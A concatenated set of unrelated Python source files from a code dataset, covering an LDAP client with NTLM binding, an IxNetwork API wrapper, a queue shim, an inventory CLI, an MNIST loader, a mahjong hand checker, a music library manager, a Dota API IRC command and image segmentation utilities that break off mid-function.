bindRequest['authentication'] = AuthenticationChoice().setComponentByName(authenticationChoice, AuthSimple(password))
resp = self.sendReceive('bindRequest', bindRequest)[0]['protocolOp']
elif authenticationChoice == 'sicilyPackageDiscovery':
bindRequest['authentication'] = AuthenticationChoice().setComponentByName(authenticationChoice, '')
resp = self.sendReceive('bindRequest', bindRequest)[0]['protocolOp']
elif authenticationChoice == 'sicilyNegotiate':
# Deal with NTLM Authentication
if lmhash != '' or nthash != '':
if len(lmhash) % 2: lmhash = '0%s' % lmhash
if len(nthash) % 2: nthash = '0%s' % nthash
try: # just in case they were converted already
lmhash = unhexlify(lmhash)
nthash = unhexlify(nthash)
except:
pass
# NTLM Negotiate
negotiate = getNTLMSSPType1('',domain)
bindRequest['authentication'] = AuthenticationChoice().setComponentByName('sicilyNegotiate', negotiate)
resp = self.sendReceive('bindRequest', bindRequest)[0]['protocolOp']
# NTLM Challenge
type2 = resp['bindResponse']['matchedDN']
# NTLM Auth
type3, exportedSessionKey = getNTLMSSPType3(negotiate, str(type2), user, password, domain, lmhash, nthash)
bindRequest['authentication'] = AuthenticationChoice().setComponentByName('sicilyResponse', type3)
resp = self.sendReceive('bindRequest', bindRequest)[0]['protocolOp']
else:
raise LDAPSessionError(errorString='Unknown authenticationChoice %s' % authenticationChoice)
if resp['bindResponse']['resultCode'] != 0:
raise LDAPSessionError(errorString = 'Error in bindRequest -> %s:%s' % (resp['bindResponse']['resultCode'].prettyPrint(), resp['bindResponse']['diagnosticMessage'] ))
return True
def search(self, searchBase=None, searchFilter=None, scope=SCOPE_SUB, attributes=None, derefAliases=DEREF_NEVER,
sizeLimit=0):
# ToDo: For now we need to specify a filter as a Filter instance, meaning, we have to programmatically build it
# ToDo: We have to create functions to parse and compile a text searchFilter into a Filter instance.
if searchBase is None:
searchBase = self._baseDN
searchRequest = SearchRequest()
searchRequest['baseObject'] = LDAPDN(searchBase)
searchRequest['scope'] = Scope(scope)
searchRequest['derefAliases'] = DeRefAliases(derefAliases)
searchRequest['sizeLimit'] = IntegerPositive(sizeLimit)
searchRequest['timeLimit'] = IntegerPositive(0)
searchRequest['typesOnly'] = Boolean(False)
searchRequest['filter'] = searchFilter
searchRequest['attributes'] = AttributeSelection()
if attributes is not None:
for i,item in enumerate(attributes):
searchRequest['attributes'][i] = item
done = False
answers = []
# We keep asking records until we get a searchResDone packet
while not done:
resp = self.sendReceive('searchRequest', searchRequest)
for item in resp:
protocolOp = item['protocolOp']
if protocolOp.getName() == 'searchResDone':
done = True
if protocolOp['searchResDone']['resultCode'] != 0:
raise LDAPSearchError(error = int(protocolOp['searchResDone']['resultCode']), errorString = 'Error in searchRequest -> %s:%s' % (protocolOp['searchResDone']['resultCode'].prettyPrint(), protocolOp['searchResDone']['diagnosticMessage'] ), answers=answers)
else:
answers.append(item['protocolOp'][protocolOp.getName()])
return answers
def close(self):
if self._socket is not None:
self._socket.close()
def send(self, protocolOp, message):
ldapMessage = LDAPMessage( )
ldapMessage['messageID'] = IntegerPositive(self._messageId)
ldapMessage['protocolOp'] = ProtocolOp().setComponentByName(protocolOp, message)
data = encoder.encode(ldapMessage)
return self._socket.sendall(data)
def recv(self):
REQUEST_SIZE = 8192
data = ''
done = False
while not done:
recvData = self._socket.recv(REQUEST_SIZE)
if len(recvData) < REQUEST_SIZE:
done = True
data += recvData
answers = []
while len(data) > 0:
try:
ldapMessage, remaining = decoder.decode(data, asn1Spec = LDAPMessage())
except SubstrateUnderrunError:
# We need more data
remaining = data + self._socket.recv(REQUEST_SIZE)
else:
answers.append(ldapMessage)
data = remaining
self._messageId += 1
return answers
def sendReceive(self, protocolOp, message):
self.send(protocolOp, message)
return self.recv()
class LDAPSessionError(Exception):
"""
This is the exception every client should catch
"""
def __init__( self, error = 0, packet=0, errorString=''):
Exception.__init__(self)
self.error = error
self.packet = packet
self.errorString = errorString
def getErrorCode( self ):
return self.error
def getErrorPacket( self ):
return self.packet
def getErrorString( self ):
return self.errorString
def __str__( self ):
return self.errorString
class LDAPSearchError(LDAPSessionError):
def __init__( self, error = 0, packet=0, errorString='', answers = []):
LDAPSessionError.__init__(self, error, packet, errorString)
self.answers = answers
def getAnswers( self ):
return self.answers
| StarcoderdataPython |
1874902 | <gh_stars>10-100
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class Ipv6Prefixes(Base):
"""This object helps to set the prefixes count of IPv6 prefix type.
The Ipv6Prefixes class encapsulates a list of ipv6Prefixes resources that are managed by the system.
A list of resources can be retrieved from the server using the Ipv6Prefixes.find() method.
"""
__slots__ = ()
_SDM_NAME = 'ipv6Prefixes'
_SDM_ATT_MAP = {
'Age': 'age',
'HostName': 'hostName',
'Ipv6Prefix': 'ipv6Prefix',
'LearnedVia': 'learnedVia',
'LspId': 'lspId',
'Metric': 'metric',
'SequenceNumber': 'sequenceNumber',
}
_SDM_ENUM_MAP = {
}
def __init__(self, parent, list_op=False):
super(Ipv6Prefixes, self).__init__(parent, list_op)
@property
def Age(self):
# type: () -> int
"""
Returns
-------
- number: The time since last refreshed.
"""
return self._get_attribute(self._SDM_ATT_MAP['Age'])
@property
def HostName(self):
# type: () -> str
"""
Returns
-------
- str: The host name as retrieved from the related packets.
"""
return self._get_attribute(self._SDM_ATT_MAP['HostName'])
@property
def Ipv6Prefix(self):
# type: () -> str
"""
Returns
-------
- str: Mask width of IPv6 Prefix.
"""
return self._get_attribute(self._SDM_ATT_MAP['Ipv6Prefix'])
@property
def LearnedVia(self):
# type: () -> str
"""
Returns
-------
- str: Learned via L1 Adjacency/L2 Adjacency.
"""
return self._get_attribute(self._SDM_ATT_MAP['LearnedVia'])
@property
def LspId(self):
# type: () -> str
"""
Returns
-------
- str: The LSP number.
"""
return self._get_attribute(self._SDM_ATT_MAP['LspId'])
@property
def Metric(self):
# type: () -> int
"""
Returns
-------
- number: The route metric.
"""
return self._get_attribute(self._SDM_ATT_MAP['Metric'])
@property
def SequenceNumber(self):
# type: () -> int
"""
Returns
-------
- number: Sequence number of the LSP containing the route.
"""
return self._get_attribute(self._SDM_ATT_MAP['SequenceNumber'])
def add(self):
"""Adds a new ipv6Prefixes resource on the json, only valid with config assistant
Returns
-------
- self: This instance with all currently retrieved ipv6Prefixes resources using find and the newly added ipv6Prefixes resources available through an iterator or index
Raises
------
- Exception: if this function is not being used with config assistance
"""
return self._add_xpath(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(self, Age=None, HostName=None, Ipv6Prefix=None, LearnedVia=None, LspId=None, Metric=None, SequenceNumber=None):
# type: (int, str, str, str, str, int, int) -> Ipv6Prefixes
"""Finds and retrieves ipv6Prefixes resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ipv6Prefixes resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all ipv6Prefixes resources from the server.
Args
----
- Age (number): The time since last refreshed.
- HostName (str): The host name as retrieved from the related packets.
- Ipv6Prefix (str): Mask width of IPv6 Prefix.
- LearnedVia (str): Learned via L1 Adjacency/L2 Adjacency.
- LspId (str): The LSP number.
- Metric (number): The route metric.
- SequenceNumber (number): Sequence number of the LSP containing the route.
Returns
-------
- self: This instance with matching ipv6Prefixes resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of ipv6Prefixes data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the ipv6Prefixes resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
| StarcoderdataPython |
8150194 | <reponame>magicly/sample-factory
"""
Fake implementation of faster-fifo that just routes all function calls to multiprocessing.Queue.
Can be useful on platforms where faster-fifo does not work, e.g. Windows.
"""
import multiprocessing
from queue import Empty
class Queue:
def __init__(self, max_size_bytes=200000):
self.q = multiprocessing.Queue(max_size_bytes)
def close(self):
self.q.close()
def is_closed(self):
"""Not implemented."""
return False
def put(self, x, block=True, timeout=float(1e3)):
self.q.put(x, block, timeout)
def put_nowait(self, x):
return self.put(x, block=False)
def get_many(self, block=True, timeout=float(1e3), max_messages_to_get=int(1e9)):
msgs = []
while len(msgs) < max_messages_to_get:
try:
if len(msgs) == 0:
msg = self.q.get(block, timeout)
else:
msg = self.q.get_nowait()
msgs.append(msg)
except Empty:
break
return msgs
def get_many_nowait(self, max_messages_to_get=int(1e9)):
return self.get_many(block=False, max_messages_to_get=max_messages_to_get)
def get(self, block=True, timeout=float(1e3)):
return self.get_many(block=block, timeout=timeout, max_messages_to_get=1)[0]
def get_nowait(self):
return self.get(block=False)
def qsize(self):
return self.q.qsize()
def empty(self):
return self.q.empty()
def full(self):
return self.q.full()
def join_thread(self):
self.q.join_thread()
def cancel_join_thread(self):
self.q.cancel_join_thread() | StarcoderdataPython |
9796435 | from model import Product
class InputView:
def enter_info(self):
print('[InputView]')
id_ = int(input('Product ID: '))
name_ = input('Name: ')
price_ = float(input('Price: '))
quantity_ = int(input("Quantity: "))
date_ = input('Date Added: ')
return id_, name_, price_, quantity_, date_
def enter_id_search(self):
id_ = int(input('[InputView]\nSearch ID number: '))
return id_
def enter_delete_alldb(self):
while True:
d = input('Delete ALL data in db?(y/n)\n')
if d.lower() == 'y':
return True
elif d.lower() == 'n':
return False
else:
print('[error] Number invalid..')
def enter_delete_id(self):
num_ = int(input('[InputView]\nEnter ID (to be deleted): '))
return num_
def enter_update_id(self):
print('[InputView]')
id_ = int(input('Product ID(to be updated): '))
price_ = float(input('Update Price (BLANK if unchanged): '))
quantity_ = int(input('Update Quantity (BLANK if unchanged): '))
return id_, price_, quantity_
class OutputView:
def show_all(self, product_list: list):
for product in product_list:
p_ = Product(product[0], product[1], product[2], product[3], product[4])
print(p_)
def show_id_search(self, product_list: list):
print('[OutputView] Id search..')
if product_list:
p_ = Product(product_list[0][0], product_list[0][1], product_list[0][2], product_list[0][3],
product_list[0][4])
print(p_)
return True
else:
print('No Match..')
return False
def show_delete_alldb(self, confirm_):
print('[OutputView] Delete all in db..')
if confirm_:
print("Successful..")
else:
print("Delete failed (nothing in db)..")
def show_cancel_delete(self):
print('[OutputView]')
print('Delete cancelled')
def show_delete_id(self, confirm_):
print('[OutputView] Delete id in db..')
if confirm_:
print("Delete successful..")
else:
print("Id not in db..")
def show_update_id(self, confirm_):
print('[OutputView] Update id in db..')
if confirm_:
print("Update successful..")
else:
print("Update unsuccessful(no input values)")
class MenuView:
def __init__(self):
self.choice = None
self.choose_execute = 1
self.choose_search_alldb = 2
self.choose_search_id = 3
self.choose_delete_alldb = 4
self.choose_delete_id = 5
self.choose_update_id = 6
self.choose_end = 9
def nav(self):
s = '''\n[ShopMenu]
⑴ Add New
⑵ Return Everything
⑶ Search by ID
⑷ Delete Everything
⑸ Delete by ID
⑹ Update Price, Quantity
⑼ Exit
➤➤ '''
self.choice = int(input(s))
| StarcoderdataPython |
1989059 | # -- coding: utf-8 --
import gzip
import os
import pickle
import numpy as np
from neuron_network.activation_function import sigmoid, softmax_avoid_overflow
def one_hot_function(x, num_class=None):
"""one_hot label into vector"""
if not num_class:
num_class = np.max(x) + 1
ohx = np.zeros([len(x), num_class])
ohx[range(len(x)), x] = 1
return ohx
def load_mnist(data_folder=r'D:\AI\myData\mnist', flattern=False, one_hot=False, normalize=False):
"""加载本地mnist数据集返回numpy数组"""
files = [
'train-labels-idx1-ubyte.gz', 'train-images-idx3-ubyte.gz',
't10k-labels-idx1-ubyte.gz', 't10k-images-idx3-ubyte.gz'
]
paths = []
for fname in files:
paths.append(os.path.join(data_folder, fname))
with gzip.open(paths[0], 'rb') as lbpath:
y_train = np.frombuffer(lbpath.read(), np.uint8, offset=8)
if one_hot:
y_train = one_hot_function(y_train)
with gzip.open(paths[1], 'rb') as imgpath:
if flattern:
x_train = np.frombuffer(
imgpath.read(), np.uint8, offset=16).reshape(len(y_train), 28 * 28)
else:
x_train = np.frombuffer(
imgpath.read(), np.uint8, offset=16).reshape(len(y_train), 28, 28)
if normalize:
x_train = (x_train / 127.5) - 1
with gzip.open(paths[2], 'rb') as lbpath:
y_test = np.frombuffer(lbpath.read(), np.uint8, offset=8)
if one_hot:
y_test = one_hot_function(y_test)
with gzip.open(paths[3], 'rb') as imgpath:
if flattern:
x_test = np.frombuffer(
imgpath.read(), np.uint8, offset=16).reshape(len(y_test), 28 * 28)
else:
x_test = np.frombuffer(
imgpath.read(), np.uint8, offset=16).reshape(len(y_test), 28, 28)
if normalize:
x_test = (x_test / 127.5) - 1
return (x_train, y_train), (x_test, y_test)
def get_data():
(x_train, y_train), (x_test, y_test) = \
load_mnist(r'D:\AI\myData\mnist', flattern=True, one_hot=True, normalize=False)
return x_test, y_test
def init_network():
with open('sample_weight.pkl', 'rb') as f:
network = pickle.load(f)
return network
def predict(network, x):
W1, W2, W3 = network['W1'], network['W2'], network['W3']
b1, b2, b3 = network['b1'], network['b2'], network['b3']
a1 = np.dot(x, W1) + b1
z1 = sigmoid(a1)
a2 = np.dot(z1, W2) + b2
z2 = sigmoid(a2)
a3 = np.dot(z2, W3) + b3
y = softmax_avoid_overflow(a3)
return y
def calculate_accuracy_onebyone():
x, t = get_data()
network = init_network()
accuracy_cnt = 0
for i in range(len(x)):
y = predict(network, x[i])
index = np.argmax(y)
if index == t[i]:
accuracy_cnt += 1
return float(accuracy_cnt/len(x))
def calculate_accuracy_batch(batchsize):
x, t = get_data()
network = init_network()
accuracy_cnt = 0
for i in range(0, len(x), batchsize):
x_batch = x[i: i + batchsize]
y_batch = predict(network, x_batch)
index = np.argmax(y_batch, axis=1) # 按行取索引
accuracy_cnt += np.sum(index == t[i: i + batchsize])
return float(accuracy_cnt/len(x)) | StarcoderdataPython |
69942 | # coding=utf-8
import copy
import time
from service.mahjong.models.hutype.basetype import BaseType
from service.mahjong.constants.carddefine import CardType
from service.mahjong.models.hutype.basetype import BaseType
from service.mahjong.constants.carddefine import CardType, CARD_SIZE
from service.mahjong.models.card.hand_card import HandCard
from service.mahjong.models.utils.cardanalyse import CardAnalyse
class YiSeSanBuGao(BaseType):
"""
2) 一色三步高 : 胡牌时,牌里有一种花色的牌,依次递增一位或依次递增二位数字的3副顺子。
"""
def __init__(self):
super(YiSeSanBuGao, self).__init__()
def is_this_type(self, hand_card, card_analyse):
chi_card_vals = hand_card.chi_card_vals
ret = card_analyse.get_jiang_ke_shun_plus(hand_card.hand_card_vals)
for index in range(len(ret)):
s = ret[index]["s"]
s.extend(chi_card_vals)
if len(s) < 3:
return False
s.sort()
if s[0][1] == s[1][0] and s[0][2] == s[2][0]:
return True
if s[0][2] == s[1][0] and s[1][2] == s[2][2]:
return True
if len(s) == 4:
if s[1][1] == s[2][0] and s[1][2] == s[3][0]:
return True
if s[1][2] == s[2][0] and s[2][2] == s[3][2]:
return True
print(s)
return False
if __name__ == "__main__":
pass
card_analyse = CardAnalyse()
hand_card = HandCard(0, None)
# hand_card.hand_card_info = {
# 1: [9, 1, 1, 1, 1, 1, 1, 1, 1, 1], # 万
# 2: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 条
# 3: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 饼
# 4: [2, 2, 0, 0, 0], # 风
# 5: [3, 3, 0, 0], # 箭
# }
hand_card.hand_card_info = {
1: [12, 2, 2, 2, 2, 2, 2, 0, 0, 0], # 万
2: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 条
3: [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], # 饼
4: [0, 0, 0, 0, 0], # 风
5: [2, 2, 0, 0], # 箭
}
hand_card.handle_hand_card_for_settle_show()
hand_card.union_hand_card()
print("hand_card =", hand_card.hand_card_vals)
test_type = YiSeSanBuGao()
start_time = time.time()
print(test_type.is_this_type(hand_card, card_analyse))
print("time = ", time.time() - start_time) | StarcoderdataPython |
220038 | """
fuocore.library
---------------
"""
import logging
from .utils import log_exectime
logger = logging.getLogger(__name__)
class Library(object):
"""library manages a set of providers
Library is the entry point for music resources
"""
def __init__(self):
self._providers = set()
def register(self, provider):
"""add a provider to library"""
self._providers.add(provider)
def deregister(self, provider):
"""remove a provider to library"""
self._providers.remove(provider)
def get(self, identifier):
"""get provider by id"""
for provider in self._providers:
if provider.identifier == identifier:
return provider
return None
def list(self):
"""list all providers"""
return list(self._providers)
def search(self, keyword, source_in=None, **kwargs):
"""search song/artist/album by keyword
TODO: search album or artist
"""
for provider in self._providers:
if source_in is not None:
if provider.identifier not in source_in:
continue
try:
result = provider.search(keyword=keyword)
except Exception as e:
logger.exception(str(e))
logger.error('Search %s in %s failed.' % (keyword, provider))
else:
yield result
@log_exectime
def list_song_standby(self, song, onlyone=True):
"""try to list all valid standby
Search a song in all providers. The typical usage scenario is when a
song is not available in one provider, we can try to acquire it from other
providers.
Standby choosing strategy: search from all providers, select two song from each provide.
Those standby song should have same title and artist name.
TODO: maybe we should read a strategy from user config, user
knows which provider owns copyright about an artist.
FIXME: this method will send several network requests,
which may block the caller.
:param song: song model
:param exclude: exclude providers list
:return: list of songs (maximum count: 2)
"""
def get_score(standby):
score = 1
# 分数占比关系:
# title + album > artist
# artist > title > album
if song.artists_name != standby.artists_name:
score -= 0.4
if song.title != standby.title:
score -= 0.3
if song.album_name != standby.album_name:
score -= 0.2
return score
valid_sources = [p.identifier for p in self.list() if p.identifier != song.source]
q = '{} {}'.format(song.title, song.artists_name)
standby_list = []
for result in self.search(q, source_in=valid_sources, limit=10):
for standby in result.songs[:2]:
standby_list.append(standby)
standby_list = sorted(
standby_list,
key=lambda standby: get_score(standby), reverse=True
)
valid_standby_list = []
for standby in standby_list:
if standby.url:
valid_standby_list.append(standby)
if get_score(standby) == 1 or onlyone:
break
if len(valid_standby_list) >= 2:
break
return valid_standby_list
| StarcoderdataPython |
6590310 | <reponame>ark120202/ModDotaFAQ
import simplejson
import string
import time
import traceback
import logging
import requests
ID="api" #this is our command identifier, so with conventional commands, this is the command name
permission=0 #Min permission required to run the command (needs to be 0 as our lowest command is 0)
import collections
def update(d, u):
for k, v in u.iteritems():
if isinstance(v, collections.Mapping):
r = update(d.get(k, {}), v)
d[k] = r
else:
d[k] = u[k]
return d
class ModDotaAPI:
def __init__(self):
self.requests_session = requests.Session()
self.requests_session.headers = {
'User-agent': 'ModDota_API/1.X (+http://github.com/SinZ163/ModDotaFAQ)'
}
self.ReadDump()
def fetch_page(self, url, timeout=10, decode_json=True):
request = self.requests_session.get(url, timeout=timeout)
if decode_json:
return request.json()
else:
return request.text
def ReadDump(self):
#serverInfo = self.fetch_page("https://raw.githubusercontent.com/ModDota/API/master/_data/lua_server.json")
serverInfo = self.fetch_page("https://raw.githubusercontent.com/SinZ163/TestTracking/master/lua_server.json")
communityInfo = self.fetch_page("https://raw.githubusercontent.com/ModDota/API/master/_data/override_lua_server.json")
self.lua_server = serverInfo.copy()
self.lua_server = update(self.lua_server, communityInfo)
#TODO: add community db here and inject into lua_server
MDAPI_logger = logging.getLogger("MDAPI_Reborn")
modDotaAPI = ModDotaAPI()
#called when the bot has loaded everything and is connected
def __initialize__(self, Startup):
pass
#the command entry point from '=api" or something
def execute(self, name, params, channel, userdata, rank):
msg = " ".join(params)
functions = []
output = channel
#TODO: add logic to figure out which dump we want
for Class, ClassInfo in modDotaAPI.lua_server.iteritems():
for FunctionName, FunctionInfo in ClassInfo["functions"].iteritems():
#print(FunctionName)
if msg.lower() in FunctionName.lower():
MDAPI_logger.info("Found a method, "+FunctionName)
functions.append((Class, FunctionName))
if len(functions) == 0:
self.sendMessage(channel, "No results found.")
if len(functions) > 5:
#pm it
if name == "DB" or len(functions) > 20:
self.sendMessage(channel, "Too many functions matched ("+str(len(functions))+"). Please refine your search.")
return
else:
output = name
self.sendMessage(channel, "Too many functions matched ("+str(len(functions))+"). replying privately.")
colBold = chr(2)
colItalics = chr(29)
colGreen = chr(3)+"03"
colBlue = chr(3)+"02"
colBrown = chr(3)+"07"
colEnd = chr(3)
for function in functions:
className = function[0]
functionName = function[1]
functionInfo = modDotaAPI.lua_server[className]["functions"][functionName]
argInfo = ""
description = ""
if "args" in functionInfo:
if len(functionInfo["args"]) > 0:
#We have argument info
for index, arg in enumerate(functionInfo["args"]):
if index > 0:
argInfo = argInfo + ", "
if "arg_names" in functionInfo:
if len(functionInfo["arg_names"]) > 0:
#we have argument info with named variables
argInfo = argInfo + u"{nullable}{colBrown}{argType}{colBrown}{nullable} {colBlue}{argName}{colEnd}".format(
colBrown = colBrown,
colBlue = colBlue,
colEnd = colEnd,
argType = arg,
argName = functionInfo["arg_names"][index],
nullable = colItalics if "?" in arg else ""
)
continue
argInfo = argInfo + u"{nullable}{colBrown}{argType}{colEnd}{nullable}".format(
colBrown = colBrown,
colEnd = colEnd,
argType = arg,
nullable = colItalics if "?" in arg else ""
)
if argInfo != "":
argInfo = " " + argInfo + " "
if "description" in functionInfo:
description = "{colGreen} -- {description}{colEnd}".format(
description = functionInfo["description"],
colGreen = colGreen,
colEnd = colEnd
)
#self.sendMessage(output, "["+method[0]+"] "+modDotaAPI.db[method[0]]["methods"][method[1]]["return"] + " " + method[1] + colBold+"(" + colBold + msg + colBold+")" + colBold + comment)
self.sendMessage(output, "[{colBlue}{className}{colEnd}] {colBrown}{returnType}{colEnd} {name}{bold}({bold}{argInfo}{bold}){bold} {description}".format(
bold = colBold,
italic = colItalics,
colBlue = colBlue,
colBrown = colBrown,
colEnd = colEnd,
className = className,
name = functionName,
returnType = functionInfo["return"],
argInfo = argInfo,
description = description
))
| StarcoderdataPython |
1776620 | <reponame>xtero/webSound
from setuptools import setup
setup( name='webSound',
version='0.1',
description='Web server to handle notification handle trigger sounds',
author='<NAME>',
author_email="<EMAIL>",
packages=['animator'],
install_requires=[
'flask',
'flask_restful',
'python-vlc'
],
zip_safe=False)
| StarcoderdataPython |
4801544 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: segmentation.py
# Author: <NAME> <<EMAIL>>
import numpy as np
from math import ceil
import cv2,colorsys
import pydensecrf.densecrf as dcrf
import os, sys
from tensorpack.utils import logger
from tensorpack.utils.palette import PALETTE_RGB
__all__ = ['update_confusion_matrix', 'predict_slider']
# Colour map. #BGR order.
label_colours = [(35,142,107),(70,70,70),(128,64,128),(142,0,0),(0,0,0)
# 0=vegetarian, 1=building, 2=road 3=vehicle, 4=other
,(0,0,0),(0,0,0),(0,0,0),(0,0,0),(0,0,0),(0,0,0)
,(0,0,0),(0,0,0),(0,0,0),(0,0,0),(0,0,0),(0,0,0)
,(0,0,0),(0,0,0),(0,0,0),(0,0,0),(0,0,0)]
# coco
# label_colours = [(0,0,0)
# 0=background
# ,(128,0,0),(0,128,0),(128,128,0),(0,0,128),(128,0,128)
# # 1=aeroplane, 2=bicycle, 3=bird, 4=boat, 5=bottle
# ,(0,128,128),(128,128,128),(64,0,0),(192,0,0),(64,128,0)
# # 6=bus, 7=car, 8=cat, 9=chair, 10=cow
# ,(192,128,0),(64,0,128),(192,0,128),(64,128,128),(192,128,128)
# # 11=diningtable, 12=dog, 13=horse, 14=motorbike, 15=person
# ,(0,64,0),(128,64,0),(0,192,0),(128,192,0),(0,64,128)]
# # 16=potted plant, 17=sheep, 18=sofa, 19=train, 20=tv/monitor
id_to_name = {
0:"background",
1:"aeroplane",
2:"bicycle",
3:"bird",
4:"boat",
5:"bottle",
6:"bus",
7:"car",
8:"cat",
9:"chair",
10:"cow",
11:"diningtable",
12:"dog",
13:"horse",
14:"motorbike",
15:"person",
16:"plant",
17:"sheep",
18:"sofa",
19:"train",
20:"tv/monitor"
}
ignore_color = (255,255,255)
fuzzy_color = (64,0,128)
label2_colours = [(192,128,0),(64,0,128)]
def update_confusion_matrix(pred, label, conf_m, nb_classes, ignore = 255):
ignore_index = label != ignore
seg_gt = label[ignore_index].astype('int32')
seg_pred = pred[ignore_index].astype('int32')
index = (seg_gt * nb_classes + seg_pred).astype('int32')
label_count = np.bincount(index)
for i_label in range(nb_classes):
for i_pred_label in range(nb_classes):
cur_index = i_label * nb_classes + i_pred_label
if cur_index < len(label_count):
conf_m[i_label, i_pred_label] += label_count[cur_index] #notice here, first dimension is label,second dimension is prediction.
return conf_m
def imwrite_grid(image,label,prediction,uncertainty,border,prefix_dir, imageId):
h,w,_ = image.shape
grid_num = h/border
for i in range(grid_num):
for j in range(grid_num):
start_i = border*i
start_j = border*j
end_i = border*(i+1)
end_j = border*(j+1)
cv2.imwrite(os.path.join(prefix_dir,"out{}_patch{}_{}.png".format(imageId,i,j)),
np.concatenate((image[start_i:end_i,start_j:end_j],
visualize_label(label[start_i:end_i,start_j:end_j]),
visualize_label(prediction[start_i:end_i,start_j:end_j]),uncertainty[start_i:end_i,start_j:end_j]), axis=1))
def pad_image(img, target_size):
"""Pad an image up to the target size."""
rows_missing = max(target_size[0] - img.shape[0], 0)
cols_missing = max(target_size[1] - img.shape[1], 0)
try:
padded_img = np.pad(img, ((0, rows_missing), (0, cols_missing), (0, 0)), 'constant')
except Exception as e:
print(str(e))
pass
return padded_img, [0,target_size[0]-rows_missing,0,target_size[1] - cols_missing]
def pad_edge(img, target_size):
"""Pad an image up to the target size."""
rows_missing = max(target_size[0] - img.shape[0], 0)
cols_missing = max(target_size[1] - img.shape[1], 0)
padded_img = np.pad(img, ((0, rows_missing), (0, cols_missing), (0, 0)), 'constant')
return padded_img, [0,target_size[0]-rows_missing,0,target_size[1] - cols_missing]
def apply_mask(image, mask, color, alpha=0.5):
"""Apply the given mask to the image.
"""
for c in range(3):
image[:, :, c] = np.where(mask == 1,
image[:, :, c] *
(1 - alpha) + alpha * color[c] * 255,
image[:, :, c])
return image
#https://github.com/matterport/Mask_RCNN/blob/master/visualize.py
def visualize_binary_mask(image, label,color, class_num, alpha=0.5):
"""Color classes a good distance away from each other."""
image = np.copy(image)
for ii in range(1,class_num):# background no mask
for c in range(3):
image[:, :, c] = np.where(label == ii,
image[:, :, c] *
(1 - alpha) + alpha * color[c],
image[:, :, c])
return image
def crop_saliency(img, label):
img_copy = np.copy(img)
if len(label.shape) == 2:
label = label[:,:,np.newaxis]*np.ones((1,1,3))
img_copy[label==0] = 255 #white
return img_copy
def visualize_label(label, class_num=21, ignore_label = 255):
"""Color classes a good distance away from each other."""
if len(label.shape) == 3:
label = np.squeeze(label)
h, w = label.shape
img_color = np.zeros((h, w, 3)).astype('uint8')
if class_num == 2:#if two class, using white-black colormap to enlarge contrast
my_label_colours = [(255, 255, 255),(0, 0, 0)]
else:
if class_num > 21:
my_label_colours = [PALETTE_RGB[i][::-1] for i in range(class_num)]
else:
my_label_colours = label_colours
for i in range(0,class_num):
img_color[label == i] = my_label_colours[i]
img_color[label==ignore_label] = ignore_color#highlight ignore label
return img_color
def visualize_uncertainty(prob):
prob = np.amax(prob,axis=2,keepdims=False)*255
return prob
def visualize_strict_uncertainty(prob,label):
h,w,c = prob.shape
gt = np.reshape(label,(h*w))
prob = np.reshape(prob,(h*w,c))
gt_idx = np.where(gt > -1)[0]
idx = np.vstack((gt_idx, gt))
tmp = prob[list(idx)] #TODO advance index in numpy, here is buggy, because 255 ignore,index 255 is out of bounds for axis 1 with size 21
tmp = tmp*255
tmp = np.reshape(tmp,(w,h)).astype(np.uint8)
return tmp
def visualize_mixlabel(label,mask):#H,W,C
"""Color classes a good distance away from each other."""
h, w, c = label.shape
img_color = np.zeros((h, w, 3)).astype('uint8')
for i in range(h):
for j in range(w):
aa = 0
bb=0
cc=0
if len(np.where(label[i,j]>0)[0]) >1:
img_color[i,j] = fuzzy_color
continue
for k in range(c):
if label[i, j, k] > 0:
aa += label[i, j, k]*label_colours[k][0]
bb + label[i, j, k]*label_colours[k][1]
cc += label[i, j, k]*label_colours[k][2]
img_color[i,j] = [aa,bb,cc]
img_color[mask==0] = ignore_color#highlight ignore label
return img_color
def edge_predict_slider(full_image, edge, predictor, classes, tile_size):
"""slider is responsible for generate slide window,
the window image may be smaller than the original image(if the original image is smaller than tile_size),
so we need to padding.
here we should notice that the network input is fixed.
before send the image into the network, we should do some padding"""
tile_size = (tile_size, tile_size)
overlap = 1/3
stride = ceil(tile_size[0] * (1 - overlap))
tile_rows = int(ceil((full_image.shape[0] - tile_size[0]) / stride) + 1) # strided convolution formula
tile_cols = int(ceil((full_image.shape[1] - tile_size[1]) / stride) + 1)
full_probs = np.zeros((full_image.shape[0], full_image.shape[1], classes))
count_predictions = np.zeros((full_image.shape[0], full_image.shape[1], classes))
tile_counter = 0
for row in range(tile_rows):
for col in range(tile_cols):
x1 = int(col * stride)
